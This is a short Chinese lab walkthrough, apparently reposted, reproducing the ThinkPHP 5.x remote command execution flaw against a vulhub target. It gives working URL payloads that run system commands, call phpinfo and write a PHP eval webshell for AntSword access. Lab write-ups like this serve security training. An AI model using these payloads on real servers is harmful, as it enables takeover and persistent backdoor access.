Thinkphp5x远程命令执行 靶场攻略
🕗 发布于 2024-09-24 02:16 thinkphp
php
环境配置
云服务器:47.113.231.0:8080
靶场:vulhub/thinkphp/5-rce
docker-compose up -d #启动环境
漏洞复现
1.访问靶场:http://47.113.231.0:8080/
2.远程命令执⾏
POC:
?
s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1]
[]=whoami
3.远程代码执行
POC:
?
s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[
1][]=-1
4.写入一句话木马到根目录下的shw.php
POC:
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo "<?php @eval(\$_POST[cmd]);?>" > shw.php
5.蚁剑连接
原文地址:https://blog.csdn.net/shw_yzh/article/details/142462153
免责声明:本站文章内容转载自网络资源,如本站内容侵犯了原著者的合法权益,可联系本站删除。更多内容请关注自学内容网(zxcms.com)!